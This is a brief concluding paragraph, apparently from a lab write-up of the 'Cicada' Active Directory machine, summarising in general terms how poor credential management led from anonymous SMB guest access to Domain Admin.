Cicada is a classic Active Directory machine that emphasizes the dangers of poor credential management. The path from an anonymous SMB guest to Domain Admin is a realistic scenario often encountered in internal penetration tests. By combining thorough enumeration, credential spraying, and exploitation of Windows privileges, we achieved full compromise of the domain.